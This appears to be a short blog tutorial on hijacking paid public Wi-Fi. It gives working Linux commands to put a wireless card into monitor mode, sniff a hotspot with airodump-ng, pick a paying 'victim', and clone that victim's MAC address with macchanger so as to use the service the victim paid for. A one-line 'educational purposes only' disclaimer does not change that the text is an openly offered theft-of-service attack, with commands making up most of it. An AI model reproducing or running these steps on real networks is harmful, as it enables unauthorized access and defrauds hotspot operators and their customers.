Session Hijacking using Linux

Session Hijacking is basically acquiring a Session ID or any other information that can make a server provide you the service of your victim.

In this post I will show how to acquire a MAC Address of the network card of your victim for a public hotspot.

Information for Educational Purposes only

The hotspots that require you to pay for per hour basis is quite an absurd idea, to overcome that acquire the MAC Address of a victim who actually paid for the service.

In order to get the MAC Address, you will need to sniff the traffic of the hotspot.

Tools

1. Backtrack or any other linux distribution
2. Airodump-ng
3. macchanger

Install these [Backtrack users already possess these], using root user authority [sudo]

start off by putting your wireless card into monitor mode

iwconfig wlan0 mode monitor

wlan0 : interface name for most cases, if its different in yours place your interface name instead of wlan0.

if you get an error like

Error for wireless request “Set mode” (8B06):set failed on device wlan0 device or resource busy

I encountered it too many times here is a solution you can try

rfkill block all

rfkill unblock all

iwconfig wlan0 mode monitor

once in monitor mode,

airodump-ng wlan0

this will start searching for wifi networks, find the hotspot through the ESSID and copy its BSSID, then type

airodump-ng –bssid [address] wlan0

this will start sniffing on that hotspot, next find a victim with high data usage rate and copy his MAC Address

next we have to change our MAC Address to match the victims

ifconfig wlan0 down

macchange wlan0 -m [Mac Address]

ifconfig wlan0 up

Done!

now just connect to the hotspot and surf the net your victim paid for!

The hotspot thinks you are the victim and allows you access to its service.